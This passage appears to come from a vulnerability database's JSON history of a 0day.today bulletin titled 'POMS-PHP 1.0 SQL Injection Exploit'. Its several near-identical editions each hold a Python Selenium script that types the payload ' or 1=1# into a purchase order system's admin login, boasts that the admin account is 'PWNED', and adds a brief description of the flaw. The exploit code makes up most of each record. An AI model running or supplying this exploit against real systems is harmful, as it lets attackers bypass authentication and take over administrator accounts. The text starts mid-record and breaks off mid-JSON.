'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-23] #"}, "lastseen": "2021-09-22T22:19:55", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "3b21c8ae4a0727d6b374bfa930348cb4", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-23T22:34:29", "history": [], "viewCount": 34, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-23T22:34:29", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-23T22:34:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-24] #"}, "lastseen": "2021-09-23T22:34:29", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "3f94c07677f63f0cdf788939940297ab", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-25T00:40:57", "history": [], "viewCount": 35, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-25] #"}, "lastseen": "2021-09-25T00:40:57", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "2aea90b57208dc422d67bef1d121e9a4", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-25T22:32:34", "history": [], "viewCount": 35, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-26] #"}, "lastseen": "2021-09-25T22:32:34", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "76d7a06899f77cd461bbbcefcd9aa7a1", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-26T22:38:41", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-27] #"}, "lastseen": "2021-09-26T22:38:41", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "2ef7eb91a55b65e32a766926d5433f09", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-28T20:46:27", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-28] #"}, "lastseen": "2021-09-28T20:46:27", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "d5144ba1dff1a4b4573a55e865f1ebe4", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-28T22:38:07", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-29] #"}, "lastseen": "2021-09-28T22:38:07", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "d232303c7106910b614c88de92eedc2d", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-29T22:43:07", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-09-30] #"}, "lastseen": "2021-09-29T22:43:07", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "45b74a9fd92e7399c98dd1931bd147ec", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-30T22:24:12", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 